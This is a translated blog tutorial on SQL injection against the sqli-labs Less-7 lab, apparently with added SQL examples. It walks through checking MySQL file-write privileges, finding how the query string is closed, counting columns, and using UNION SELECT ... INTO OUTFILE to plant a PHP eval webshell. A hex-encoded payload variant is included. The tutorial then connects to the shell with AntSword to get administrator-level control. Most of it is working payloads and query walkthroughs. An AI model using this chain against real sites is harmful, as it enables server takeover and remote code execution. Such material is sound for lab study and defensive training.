Basic knowledge of MySQL - key points of file upload

#Main knowledge points

1. show variables like '%secure%'; is used to check whether MySQL is allowed to read and write files at all (the secure_file_priv variable).

If the value at this position is NULL, the file read/write functions (into outfile, load_file()) cannot be used. An empty value means no restriction: any directory the MySQL server process can write to is allowed. A directory name means reads and writes are limited to that directory.

2. The FILE privilege of the database user decides whether that user may use into outfile and load_file() at all; on top of that, the operating-system account that runs mysqld needs write permission on the target directory, because the file is written by the database server process, not by the web server.

3. Environment for using into outfile: you must know one thing, the full (absolute) path of a folder on the server that the database process can write to, normally the web root so the written file can be requested over HTTP. into outfile also refuses to overwrite an existing file, so the target file name must not exist yet.
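The three checks above as one MySQL session. This is an added example, not part of the original post; the D:/phpStudy/WWW path and the probe file name are assumptions, and reading mysql.user requires an account that is allowed to see it.

```sql
-- 1. Is file I/O allowed at all, and where?
SHOW VARIABLES LIKE 'secure_file_priv';
--   NULL          -> INTO OUTFILE / LOAD_FILE() are disabled, no write is possible
--   ''            -> no restriction: any directory the mysqld OS account can write to
--   'D:/some/dir' -> reads and writes only inside that directory

-- 2. Does the database account hold the FILE privilege?
--    INTO OUTFILE needs it in addition to the OS-level write permission of the mysqld process.
SHOW GRANTS FOR CURRENT_USER();
--   e.g. GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost'   (ALL includes FILE)
SELECT user, host, file_priv
FROM mysql.user
WHERE CONCAT(user, '@', host) = CURRENT_USER();               -- file_priv = 'Y' is what we need

-- 3. Find an absolute path to write to. These variables leak the install layout
--    (basedir/datadir under D:\phpStudy\... in the lab), from which the web root is guessed.
SELECT @@version_compile_os, @@basedir, @@datadir;

-- 4. Harmless probe write before the real payload (path is an assumption).
--    With secure_file_priv=NULL this fails with "running with the --secure-file-priv option";
--    if probe.txt already exists it fails with "File ... already exists", because INTO OUTFILE never overwrites.
SELECT 'probe' INTO OUTFILE 'D:/phpStudy/WWW/probe.txt';
```

Run the same checks from inside an injection point by putting each SELECT into a UNION, one column per value; the answers are the same, only the delivery differs.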

#File upload command

<?php @eval($_POST['x'])?> is a one-sentence Trojan horse (a one-line PHP webshell): it executes whatever PHP code is sent in the POST parameter x, and the @ suppresses any error output.

#File upload usage

The purpose is to write a one-sentence Trojan horse onto the server.

1. If the file lands in the website directory, you can connect to it directly through its URL.

2. If the target website has a file inclusion vulnerability, and at the same time the database has permission to write files, write the one-sentence Trojan horse wherever the database can write, even if that is not the website root but some other path on the target server, and then use the file inclusion vulnerability to include that file and trigger the Trojan.

#File upload command

?id=-1'))  union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+

"<?php @eval($_POST['x']);?>": the written content is the one-sentence Trojan horse, and x is the password (parameter name) reserved for connecting with AntSword later

into outfile: the function that writes (exports) the query result to a file on the server

"D:\\phpStudy\\WWW\\": the directory to write into. Inside a MySQL string literal \\ is one backslash, so the server receives D:\phpStudy\WWW\; forward slashes (D:/phpStudy/WWW/) also work on Windows

haha.php: the file name of the generated file

Note: the PHP code "<?php @eval($_POST['x']);?>" is wrapped in double quotes on the outside, so the parameter x inside must not use double quotes again; wrap it in single quotes instead. Otherwise the string ends early and MySQL cannot parse the statement.
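What the MySQL server actually executes for the URL above, followed by a quoting-free variant and a read-back check. This is an added example, not code from the original post; the table name users and the (('$id')) query shape are taken from sqli-labs Less-7, and the paths and the haha2.php name are assumptions.

```sql
-- What the server receives for
--   ?id=-1'))  union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+
-- Less-7 wraps the parameter as (('$id')); the '+' decodes to a space, so "--+" arrives as "-- "
-- and comments out the trailing ')) LIMIT 0,1. No terminating semicolon on purpose: the comment
-- swallows the rest of the line.
SELECT * FROM users WHERE id=(('-1')) UNION SELECT 1,2,"<?php @eval($_POST['x']);?>" INTO OUTFILE "D:\\phpStudy\\WWW\\haha.php" -- ')) LIMIT 0,1
-- id=-1 matches no row, so only the UNION row is written. With no FIELDS/LINES options the file
-- is tab-separated:   1<TAB>2<TAB><?php @eval($_POST['x']);?><LF>
-- PHP still runs it, because the <?php open tag may appear anywhere in the file.

-- Quote-free variant: MySQL accepts a hex literal wherever a string is expected, so the PHP
-- payload contains no ' or " at all (useful when quotes inside the payload are filtered).
-- 0x3c3f...3f3e is the 27 bytes of <?php @eval($_POST['x']);?>; forward slashes avoid the
-- backslash-escaping question on Windows.
SELECT * FROM users WHERE id=(('-1')) UNION SELECT 1,2,0x3c3f70687020406576616c28245f504f53545b2778275d293b3f3e INTO OUTFILE 'D:/phpStudy/WWW/haha2.php' -- ')) LIMIT 0,1

-- Read the file back to confirm the write (same FILE privilege and secure_file_priv rules apply).
SELECT LOAD_FILE('D:/phpStudy/WWW/haha.php');
```

The hex form is the one to reach for when the outer quoting is already a single quote, because the original payload's 'x' would otherwise terminate the injected string.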

#case demo

sqli-labs-master/Less-7/

1. Determining how the parameter is closed

First throw a parameter in

 

The page shows: You are in.... Use outfile......

Numeric test

url:?id=1 and 1=1

The page is normal you are in

url:?id=1 and 1=2

The page is still displayed normally, without an error

If there is no protection in the way, this basically means the parameter is a character (string) type

Because with a string type the back-end statement is

select * from database.table where id='1 and 1=2': the injected and 1=2 ends up inside the string and is treated as text, so the condition has no effect

First test

Determine whether the parameter is enclosed and closed with ' single quotes

url:id=1'

Throw a ' into it: the page reports an error, but no error message content is echoed

url:/?id=1' --+

Use --+ to comment out everything after it. If the page now shows You are in, that proves the parameter is closed with '.

But judging from the page (still an error), a single quote on its own does not close it

The second test (judging whether it is closed with " double quotes)

url:?id=1" --+

The page shows You are in...

url:?id=1" and 1=2 --+

Confirm again with and 1=2.

If the page showed an error here, the parameter would be closed with " double quotes, because the guessed statement would then contain a real and 1=2 that is false and returns no row.

But the page here still echoes You are in normally. Why?

Because the parameter is actually wrapped in ' single quotes, so the " you typed is just an ordinary character inside the string, and the --+ after it is inside the string as well and never starts a comment.

For example, if the original back-end statement is

select * from database.table where id='1'

then after your input it becomes

select * from database.table where id='1" -- '

Nothing is filtered: the whole value 1" --  is one string. MySQL compares that string with the numeric id column, converts it to the number 1, and returns the same row as id=1, so the page is echoed normally. The same happens with ?id=1" and 1=2 --+: it is still one string that still converts to 1.

So a normal page after the " test only tells you that " is not the closing character; it does not tell you what the closing character is, and we have to keep testing the other closing forms with and 1=1 and and 1=2.

Make a third test (using ') single quote plus parenthesis)

url:?id=1') --+

The page still reports an error

Do a fourth test (using ") double quote plus parenthesis)

url:?id=1") --+

The page shows You are in

url:?id=1") and 1=2 --+

Confirm again with and 1=2

The page is still displayed normally, You are in (for the same reason as the " test above: everything is still inside the single-quoted string)

Do a fifth test (using ')) single quote plus two parentheses)

url:?id=1')) --+

The page shows You are in normally

url:?id=1')) and 1=2 --+

Use and 1=2 to judge again

The page now reports an error, so the closing form is confirmed to be '))

2. Query the number of fields (order by or group by)

url:?id=1')) group by 4 --+

The page returns an error

url:?id=1')) group by 3 --+

The page displays You are in normally, without an error

From this we conclude that there are 3 fields
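The whole closing-method and field-count procedure above, shown as the statements the server actually parses for each probe. This is an added example, not from the original post; the users table is a constructed one-row stand-in for the sqli-labs table, and the (('$id')) LIMIT 0,1 shape is the Less-7 query.

```sql
-- Constructed stand-in for the sqli-labs users table (the real one holds more rows).
CREATE TABLE users (id INT, username VARCHAR(20), password VARCHAR(20));
INSERT INTO users VALUES (1, 'Dumb', 'Dumb');

-- Less-7 builds:  SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1
-- A returned row prints "You are in.... Use outfile......"; anything else prints the error text.
-- Each probe is shown as the server parses it ('+' decodes to a space, so "--+" arrives as "-- ").
-- Lines ending in a comment have no semicolon on purpose: the comment eats the rest of the line.

-- ?id=1 and 1=2          stays inside the string; '1 and 1=2' is cast to the number 1
SELECT * FROM users WHERE id=(('1 and 1=2')) LIMIT 0,1;                -- row 1 -> "You are in"

-- ?id=1'                 stray quote: '' is an escaped quote, so the literal never closes
SELECT * FROM users WHERE id=(('1'')) LIMIT 0,1;                       -- syntax error

-- ?id=1' --+             quote closed, but only one of the two parentheses
SELECT * FROM users WHERE id=(('1' -- ')) LIMIT 0,1
                                                                       -- syntax error

-- ?id=1" --+             inside a '-quoted string the " is an ordinary character, the comment
--                        never starts; '1" -- ' is cast to 1 and the normal row comes back
SELECT * FROM users WHERE id=(('1" -- ')) LIMIT 0,1;                   -- "You are in"
SELECT * FROM users WHERE id=(('1" and 1=2 -- ')) LIMIT 0,1;           -- still "You are in"

-- ?id=1') --+            one parenthesis short
SELECT * FROM users WHERE id=(('1') -- ')) LIMIT 0,1
                                                                       -- syntax error

-- ?id=1')) --+           quote and both parentheses closed, tail commented out
SELECT * FROM users WHERE id=(('1')) -- ')) LIMIT 0,1
                                                                       -- "You are in"

-- ?id=1')) and 1=2 --+   the condition is now real SQL: no row, error text => closing form is '))
SELECT * FROM users WHERE id=(('1')) AND 1=2 -- ')) LIMIT 0,1

-- Field count: GROUP BY 3 succeeds, GROUP BY 4 fails with "Unknown column '4' in 'group statement'"
SELECT * FROM users WHERE id=(('1')) GROUP BY 3 -- ')) LIMIT 0,1
SELECT * FROM users WHERE id=(('1')) GROUP BY 4 -- ')) LIMIT 0,1
-- MySQL 5.7+ with ONLY_FULL_GROUP_BY can reject GROUP BY on a SELECT * for other reasons;
-- ORDER BY 3 / ORDER BY 4 ("Unknown column '4' in 'order clause'") gives the same answer on any version.
```

Reading the probes this way is the quickest cure for the "why does a wrong closing guess still show a normal page" confusion: anything that stays inside the string is compared as a number, and 1" ... and 1') ... both become 1.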

4. Write a sentence Trojan horse

url:

?id=-1'))  union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+

Note: the content can be written in any of the fields; I wrote it in field 3, but fields 2 or 1 work as well. id=-1 is used so that the original query matches no row and only the union row ends up in the file.

After execution the page shows the error text, but that does not matter: a select ... into outfile returns no rows for the page to display, so it always lands in the error branch. If your statement is correct, the write has succeeded. (If you run it a second time, change the file name: into outfile will not overwrite an existing haha.php.)

At this point a haha.php file has been generated in the directory

Check its content: our one-sentence code has been written into it successfully

5. Connect with AntSword

Open the AntSword executable

Right-click on the blank area -> Add Data

 

URL: the address ending in haha.php, the file generated by the one-sentence write above

Connection password: x, the parameter name we put in the one-sentence Trojan

Click Test Connection -> Show Success

click to add

connection succeeded

The target server is now effectively under our remote control

Because phpStudy (Xiaopi) was started with administrator privileges in this lab, the webshell inherits them

Use whoami in the AntSword terminal to check the privilege level. If it reports administrator, the machine is basically ours to operate, because administrator is the highest privilege on Windows

If you feel that the details are not enough, you can go to https://mp.csdn.net/mp_blog/creation/editor/129723083


Origin blog.csdn.net/m0_72755466/article/details/129855419